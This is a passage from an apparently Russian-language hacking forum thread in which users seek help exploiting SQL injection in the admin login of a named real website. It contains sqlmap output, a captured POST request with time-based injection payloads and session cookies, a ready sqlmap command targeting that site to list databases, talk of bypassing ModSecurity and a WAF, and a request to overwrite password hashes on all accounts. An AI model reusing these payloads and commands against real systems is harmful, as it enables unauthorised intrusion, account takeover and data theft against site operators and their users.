Code: sqlmap identified the following injection point(s) with a total of 147 HTTP(s) requests: --- Parameter: industry (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: industry=-5813 OR 1546=1546 Vector: OR [INFERENCE] базы не показало и так же высветилась ошибка Code: [00:24:05] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
Так по ошибки он не понял вид BD у меня в приоретете стояла MySQL я удалил преоритет сейчас глану ещё раз
Всем привет! Acunetix находит boolean-based blind POST /admin/admin.php HTTP/1.1 Content-Length: 195 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://dsm-print.ru/ Cookie: SNS=8q3t6fosp0qb982nlqjkb8i3o2; PHPSESSID=2u4rtf0pji3cfe4bou3tnra5n7; _ym_uid=1518504918276952455; _ym_isad=2; _ym_visorc_44242969=w Host: dsm-print.ru Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* enter_admin=%c2%ee%e9%f2%e8&admin_name=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0)) OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&admin_password=g00dPa%24%24w0rD помогите правильно составить запрос sqlmap и раскрутить эту шнягу - что не делаю modsecurity выдает - Error 415 Unsupported Media type заранее благодарю....
Не хорошо по ру работать sqlmap --random-agent -u 'http://dsm-print.ru/admin/admin.php' --data='enter_admin=&admin_name=*&admin_password=' --dbs --is-dba ______________________________________________________________________ На счёт мод сека, тут надо уже ручками крутить ))
тож не знаю... то я загуглил. Просто тема как бэ за его продукт - вот я и отписался, для тех пацанов, кто не в курсе!)
По RU -да не вреда ради - просто очень инфа нужна - тото я гляжу сдесь половина ветки RU скулями забита.... Запрос не помог - а так если что - извиняюсь...
Не как не могу раскрутить и за этого убогого WAF Code: [04:59:22] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests [04:59:22] [WARNING] HTTP error codes detected during run: 400 (Bad Request) - 430 times, 414 (Request-URI Too Long) - 639 times [04:59:22] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF) Помогите
Тебе лучше в тему Ваши вопросы по уязвимостям обратиться с этим вопросом, информации которую ты предоставил мало, она не чем не поможет в решении проблемы.
Есть SQL injection Права Tru Как мне поменять хешь на всех акках сразу ? так вообще возможно ? Или хотя бы на один из любых